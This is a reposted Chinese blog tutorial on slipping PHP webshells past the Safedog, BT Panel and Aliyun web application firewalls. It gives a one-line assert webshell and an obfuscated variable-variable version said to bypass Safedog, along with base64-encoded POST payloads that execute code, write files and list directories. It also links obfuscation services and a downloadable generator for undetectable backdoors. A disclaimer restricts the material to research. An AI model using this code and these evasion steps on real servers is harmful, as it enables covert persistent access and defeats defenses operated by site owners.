标签:48 WAF 代码 Safedog https 轮子 绕过 com phpjiami
免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。
#Safedog代码层手写及脚本绕过
变量覆盖,加密混淆,异或生成
#BT Aliyun代码层手写及脚本绕过
编码解码(变量覆盖,加密混淆,异或生成)
ASP,PHP,ASPX,JSP,PY等后门免杀同理
http://test.xxx.com/x.php?id=x
mr6=cGhwaW5mbygpOw==
http://test.xxx.com/xx.php?x=b&y=assert
z=cGhwaW5mbygpOw== 执行代码
z=ZmlsZV9wdXRfY29udGVudHMoInRlc3QudHh0IiwiMSIpOw== 写入文件
z=dmFyX2R1bXAoc2NhbmRpcigiLiIpKTs= 读取文件
菜刀,蚁剑,冰蝎优缺点
菜刀:未更新状态,无插件,单向加密传输
蚁剑:更新状态,有插件,拓展性强,单向加密传输
冰蝎:更新状态,未知插件,双向加密传输
演示案例:
➢ Safedog-手写覆盖变异简易代码绕过-代码层
一句话木马:<?php assert($_POST['chopper']);?>
替换成:
<?php
$a=$_GET['x'];
$$a=$_GET['y'];
$b($_POST['z']);
?>
可以绕过safedog
//x=b&y=assert
//$a=b $$a=assert=$b assert($_POST['z']);
上传成功后,
例:http://127.0.0.1:8081/x/1.php?x=b&y=assert
再(可以用hackbar插件)postdata:z=phpinfo()
➢ Safedog-基于接口类加密混淆代码绕过-代码层
https://www.phpjiami.com/phpjiami.html
➢ BT,Aliyun-基于覆盖加密变异下编码解码绕过-代码层
https://www.phpjiami.com/phpjiami.html
➢ Safedog-基于工具功能数据包指纹修改变异绕过-行为层
https://pan.baidu.com/s/1msqO2kps139NNP9ZEIAVHw 提取码:xiao
基于python开发的一个工具,打开后运行php-venom-3.3.py即可生成免杀后门文件。
也可以自己二次开发,代码不难。
上传成功后使用例(base64加密):http://www.xxx.com/text.php?id=dxads
post data: mr6=cGhwaW5maSgpOw==
//cGhwaW5maSgpOw== 为phpinfo();的base64加密
➢ Safedog,BT,Aliyun-基于冰蝎新型控制器绕过全面测试-行为层
➢ Safedog,BT,Aliyun-基于手写新型控制器绕过全面测试-行为层
涉及资源:
混淆加密工具:https://github.com/djunny/enphp
https://www.phpjiami.com/phpjiami.html
冰蝎:https://github.com/rebeyond/Behinder/releases/
蚁剑:https://github.com/AntSwordProject/antSword/releases
webshell-venom-master:https://pan.baidu.com/s/1msqO2kps139NNP9ZEIAVHw 提取码:xiao
标签:48,WAF,代码,Safedog,https,轮子,绕过,com,phpjiami 来源: https://blog.csdn.net/qq_44930903/article/details/112387014
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。